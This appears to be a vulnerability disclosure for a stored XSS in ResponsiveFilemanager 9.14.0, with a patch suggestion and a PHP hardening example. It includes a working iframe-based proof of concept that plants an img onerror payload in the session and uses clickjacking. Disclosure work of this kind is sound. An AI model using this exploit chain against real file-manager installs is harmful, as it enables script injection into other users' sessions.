After taking another look at ResponsiveFilemanager 9.14.0 I noticed that in the dialog.php file on line 197, if $_SESSION['RF']["view_type"] is already set, no validation is done and the data is not taken from the config. https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L197
This created a problem because in ajax_calls.php in the "view" action in the "type" parameter it is possible to set that value without any validation. https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/ajax_calls.php#L53
This means that if you first request a session by going to dialog.php, then go to ajax_calls.php and request the view action with an HTML tag as the "type" parameter,
then, once you have done all that, go back to the dialog.php page, $_SESSION['RF']["view_type"] is read and placed unescaped in all places where $view is used, which creates a stored XSS until the session isn't valid anymore.
A very simple patch would be to add fix_get_params() in the dialog.php on line 197 when the $view is set. https://github.com/trippo/ResponsiveFilemanager/blob/master/filemanager/dialog.php#L197
I made a simple html file you can use to validate this vulnerability.
It is made for Firefox because it makes use of iframes and a clickjacking vulnerability, but if the session was already set then this would also work in other browsers with a minor change.
You would need to change all "http://192.168.0.29:3001" to your website.
When run it creates 3 iframes.
One to request the dialog.php file to get a PHPSESSID and to set $_SESSION['RF']["verify"] as RESPONSIVEfilemanager.
Second it would open the ajax_calls.php to set the html tag.
And third, it reopens the dialog.php page to trigger the stored XSS.
```html
<!DOCTYPE html>
<html>
<head>
<script>
var url = "http://192.168.0.29:3001";

/**
 * Execute the "view" action in ajax_calls.php and set an HTML tag as "type".
 * This will set $_SESSION['RF']["view_type"] on line 53 to my HTML tag.
 * https://github.com/trippo/ResponsiveFilemanager/blob/428069746fabcef495b44d690bec20a05279a194/filemanager/ajax_calls.php#L53
 **/
function iframe1() {
  var ifrm = document.createElement("iframe");
  ifrm.setAttribute("src", url + "/filemanager/ajax_calls.php?action=view&type=%22%3E%3Cimg/src=%27x%27/onerror=alert(document.domain)%3E");
  ifrm.setAttribute("onload", "iframe2();");
  ifrm.setAttribute("style", "visibility: hidden;");
  ifrm.style.width = "640px";
  ifrm.style.height = "480px";
  document.body.appendChild(ifrm);
}

/**
 * Go back to dialog.php to trigger the XSS starting at line 197: when
 * $_SESSION['RF']["view_type"] is already set and the view parameter isn't set,
 * it does not take the data from $config['default_view'] but uses the old data
 * from $_SESSION['RF']["view_type"]. And if view isn't set, it won't execute
 * fix_get_params(), which would have prevented the XSS. Because in ajax_calls.php
 * this value wasn't sanitized with fix_get_params() when we set
 * $_SESSION['RF']["view_type"], there is a stored XSS until the session expires.
 * https://github.com/trippo/ResponsiveFilemanager/blob/428069746fabcef495b44d690bec20a05279a194/filemanager/dialog.php#L197
 * https://github.com/trippo/ResponsiveFilemanager/blob/61f6b6d7d4ca2544afa55e358cb948951d6525f6/filemanager/include/utils.php#L675
 **/
function iframe2() {
  var ifrm1 = document.createElement("iframe");
  ifrm1.setAttribute("src", url + "/filemanager/dialog.php?type=0&lang=en_EN&popup=0&crossdomain=0&relative_url=0&akey=key&fldr=/");
  ifrm1.setAttribute("style", "visibility: hidden;");
  ifrm1.style.width = "640px";
  ifrm1.style.height = "480px";
  document.body.appendChild(ifrm1);
}
</script>
</head>
<body>
<!--
  Create an iframe to the dialog page to receive a PHPSESSID and to set
  $_SESSION['RF']["verify"] to RESPONSIVEfilemanager.
  https://github.com/trippo/ResponsiveFilemanager/blob/428069746fabcef495b44d690bec20a05279a194/filemanager/dialog.php#L18
  If we did not do that, this exploit would fail in ajax_calls.php on line 7.
  https://github.com/trippo/ResponsiveFilemanager/blob/428069746fabcef495b44d690bec20a05279a194/filemanager/ajax_calls.php#L7
-->
<iframe src="http://192.168.0.29:3001/filemanager/dialog.php?type=0&lang=en_EN&popup=0&crossdomain=0&relative_url=0&akey=key&fldr=/" width="200" height="100" onload="iframe1();" style="visibility: hidden;" sandbox></iframe>
</body>
</html>
```
A CVE has been requested.
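As an added illustration (not ResponsiveFilemanager's own code, and not the reporter's), the pattern the report describes next to a hardened version: the view type is validated against an allowlist on every write to the session, re-validated on read, and escaped at output as defence in depth. It assumes the valid view types are the small integer set that `default_view` in the config uses (box, list, columns); that set and the helper names are assumptions for this example.

```php
<?php
// Added example, not project code. Assumption: the valid view types are the
// integers 0, 1, 2 (box / list / columns), mirroring config 'default_view'.
const ALLOWED_VIEW_TYPES = [0, 1, 2];

/**
 * Validate a requested view type; return the int on success, null otherwise.
 * Meant to guard EVERY write to $_SESSION['RF']['view_type'], including the
 * "view" action path, so an untrusted string never reaches the session.
 */
function validate_view_type($raw): ?int {
    if (!is_int($raw) && !is_string($raw)) {
        return null;
    }
    if (!preg_match('/^\d$/', (string)$raw)) {   // reject anything but one digit
        return null;
    }
    $v = (int)$raw;
    return in_array($v, ALLOWED_VIEW_TYPES, true) ? $v : null;
}

/** Vulnerable pattern from the report: session value trusted and echoed raw. */
function render_view_vulnerable(array $session): string {
    $view = $session['RF']['view_type'];              // no validation on this path
    return '<div class="view-' . $view . '">';        // unescaped -> stored XSS
}

/** Hardened: re-validate on read, fall back to the config default, escape output. */
function render_view_hardened(array $session, int $default_view): string {
    $view = validate_view_type($session['RF']['view_type'] ?? null) ?? $default_view;
    return '<div class="view-' . htmlspecialchars((string)$view, ENT_QUOTES, 'UTF-8') . '">';
}

// Constructed session state: a tag smuggled in through an unvalidated write.
$session = ['RF' => ['view_type' => '"><b>injected</b>']];

echo render_view_vulnerable($session), PHP_EOL;   // tag is emitted verbatim
echo render_view_hardened($session, 0), PHP_EOL;  // <div class="view-0">
var_dump(validate_view_type('2'));                // int(2)
var_dump(validate_view_type('"><b>x</b>'));       // NULL
```

Even with output escaping in place, the allowlist on the write path is the fix that matters here, because the session value is reused on paths that never call `fix_get_params()`.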